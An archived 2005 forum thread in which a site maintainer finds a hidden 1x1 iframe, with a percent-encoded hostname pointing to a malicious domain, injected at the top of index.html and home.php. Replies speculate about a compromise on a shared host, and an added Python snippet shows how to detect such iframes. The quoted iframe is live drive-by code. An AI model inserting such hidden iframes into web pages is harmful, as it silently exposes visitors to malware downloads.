Is my website being hacked?

Discussion in 'Web Design & Coding' started by jimi_81, Dec 28, 2005.

  1. jimi_81

    jimi_81 Moderator Political User

    Messages:
    820
    Location:
    Stoney Creek, ON, Canada
    OK, I went to check on a site I maintain, and the page did not display; instead I was routed to download a WMF file.

    The two files that the page uses to launch, index.html and home.php, had the following lines of code at the top of each file:

    Code:
    <iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
    I didn't check the file's last-modified date... I just made the correction without thinking.

    Has anyone ever heard of this happening?
    What happened!
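
Added example, not part of the original thread: a small Python check for the kind of injected iframe quoted in the post above. It flags iframes that are invisible (width and height of 2 or less) or whose hostname is percent-encoded, and decodes the hostname for the report. The function names, the file extensions scanned and the constructed sample (which uses the reserved name www.example.test) are assumptions made for illustration.

```python
import os
import re
from urllib.parse import unquote, urlsplit

IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")

def _tiny(value):
    """True for a width/height of 0-2 pixels, i.e. an invisible frame."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 2

def find_suspicious_iframes(html):
    """Return one finding per iframe that is invisible or hides its host."""
    findings = []
    for tag in IFRAME.finditer(html):
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag.group(1))}
        src = attrs.get("src", "")
        host = urlsplit(src).netloc
        reasons = []
        if _tiny(attrs.get("width")) and _tiny(attrs.get("height")):
            reasons.append("invisible (width/height <= 2)")
        if "%" in host and unquote(host) != host:
            reasons.append("percent-encoded hostname")
        if reasons:
            findings.append({"line": html.count("\n", 0, tag.start()) + 1,
                             "src": src, "decoded_host": unquote(host).lower(),
                             "reasons": reasons})
    return findings

def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Walk a document root and yield (path, finding) for every hit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(exts)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for finding in find_suspicious_iframes(fh.read()):
                    yield path, finding

# Constructed sample: same shape as the injected line in the post, with the
# hostname swapped for the reserved name www.example.test, then a normal iframe.
ENC_HOST = "".join("%%%02X" % ord(c) for c in "www.example.test")
SAMPLE = ('<iframe src= http://' + ENC_HOST + '?id=index12 frameborder="0" '
          'width="1" height="1" scrolling="no" name=counter></iframe>\n'
          '<html><body><iframe src="/map.html" width="600" height="400">'
          '</iframe></body></html>\n')

if __name__ == "__main__":
    print(find_suspicious_iframes(SAMPLE))
```

Regex matching of HTML is a heuristic, so treat each hit from `scan_tree` as a file to inspect, and record its last-modified time before cleaning it.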
     
  2. SPeedY_B

    SPeedY_B I may actually be insane.

    Messages:
    15,800
    Location:
    Midlands, England
    Where is the site hosted? If it's a free host, it may be explainable.
     
  3. melon

    melon MS-DOS 2.0 Political User

    Messages:
    854
    Location:
    Ásgarðr
    I had the same thing happen to me. It's clearly a hack of some sort, since I'm on a paid host. I checked the "last modified" date and then my access logs, which revealed nothing out of the ordinary. I have a feeling that, since I'm on a shared host, someone else on the server was running vulnerable software (or maybe even the server itself) and just searched for every "public_html/index.html" (and probably other files like "home.php" there) it could find on the server.

    Unfortunately, I wish I had some answers as to its origin. I haven't been able to find any information myself.

    Melon
     
  4. jimi_81

    jimi_81 Moderator Political User

    Some things I have been looking at in the logs...
    Under browser lists, I see something called Curl. Never heard of it.

    I googled Curl... what does this mean:
    According to the stats page, only 1 user has curl, 1 hit registered. Looks odd, that's why I bring it up.

    The site is hosted on ipowerweb.com... I've reported it to them.
    The URL the iframe points to is a shady-looking site: trust4free.ws
     
  5. melon

    melon MS-DOS 2.0 Political User

  6. jimi_81

    jimi_81 Moderator Political User

    I feel sick to my stomach.
    ipowerweb seems to be the problem.

    I won't be renewing with them, that's for sure.
    What a piss off.

    Thanks guys, reps
     
  7. SPeedY_B

    SPeedY_B I may actually be insane.

    It could just be a vulnerable install of some web-based software (awstats, phpBB, etc.) on the same server as your site.

    Happened to me; the site was blatantly defaced though, so it was spotted straight away.
     
  8. X-Istence

    X-Istence * Political User

    Messages:
    6,498
    Location:
    USA
    curl is a pretty standard utility to transfer files. I use it all the time, and it is also implemented in quite a few web search robots. It can of course also be used for bad.

    http://curl.haxx.se